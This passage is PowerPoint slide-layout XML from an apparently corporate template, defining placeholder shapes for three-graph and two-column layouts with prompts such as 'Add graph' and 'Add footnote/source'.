        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8C4FF2-1C15-49FF-A157-74FD4FCA1CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE1E8916-5D47-4EC8-9B78-C50D26DEB07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE42928-9224-4D02-8182-2E5B4D824B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22829953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3 graphs with titles n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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFDE300-6665-4B15-B788-A2FFCDB4D523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1120989F-E7F9-408B-8E51-7D03D9500726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8072778C-C677-44DC-9873-FB44EA96CED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358767" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE6656A-2C85-499A-AFED-D7DC8FCF3D1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8C4FF2-1C15-49FF-A157-74FD4FCA1CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE1E8916-5D47-4EC8-9B78-C50D26DEB07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE42928-9224-4D02-8182-2E5B4D824B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213741330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2 content with titles &amp; dividing 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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1897924"/>
            <a:ext cx="5328591" cy="4231413"/>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GB"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8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB985924-B690-4F6B-A059-A56784949324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1897924"/>
            <a:ext cx="5328591" cy="4231413"/>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GB"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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FC0690AA-22AB-43BE-82E3-4352A408EF06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1463379"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29321681-CA4A-4D99-BB69-D603568A6CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1463379"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19881122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ubtitle &amp; 2 content with titles &amp; dividing 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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
